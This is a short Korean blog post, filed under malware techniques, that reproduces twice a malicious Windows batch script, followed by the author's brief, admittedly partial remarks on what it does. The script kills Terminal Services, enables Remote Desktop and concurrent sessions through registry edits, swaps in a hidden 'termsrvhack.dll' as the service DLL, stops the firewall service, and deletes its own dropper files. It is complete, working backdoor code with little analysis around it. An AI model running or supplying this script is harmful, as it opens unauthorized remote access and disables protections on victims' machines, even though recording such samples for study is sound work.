2010. 5. 7. 15:22, 유용한 지식 자료들/악성코드 기법
@echo off
for /f "tokens=2 delims= " %%a in ('tasklist/svc^|find ^"TermService^"') do (taskkill /pid %%a /f)
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
Attrib +H +S +R %systemroot%\system32\termsrvhack.dll
net stop sharedaccess
net start dcomlaunch
net start termservice
shutdown -a
del 3389.vbs
del 3389.bat
for /f "tokens=2 delims= " %%a in ('tasklist/svc^|find ^"TermService^"') do (taskkill /pid %%a /f)
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
Attrib +H +S +R %systemroot%\system32\termsrvhack.dll
net stop sharedaccess
net start dcomlaunch
net start termservice
shutdown -a
del 3389.vbs
del 3389.bat
요놈은 삭제만 할 줄 알았더니 직접 서비스를 한다.
대충.. termsrv.dll 파일을 이용하여 외부와 통신을 하는 목적으로 판단된다.
뭐하는 명령인지 전부는 모르지만 혹시 몰라 남겨봄~
'유용한 지식 자료들 > 악성코드 기법' 카테고리의 다른 글
| keylogging 기법 (0) | 2011.05.24 |
|---|---|
| 악성코드 기법 (2) | 2011.04.27 |
| 고급 사용자를 위한 Internet Explorer 보안 영역 레지스트리 항목 (0) | 2010.11.15 |
| 악성코드가 싫어하는 프로그램들 (0) | 2010.04.29 |
| 파일의 Entry Point 값을 파일 Offset값으로 구하는 방법 (0) | 2010.04.27 |
Comments, Trackbacks
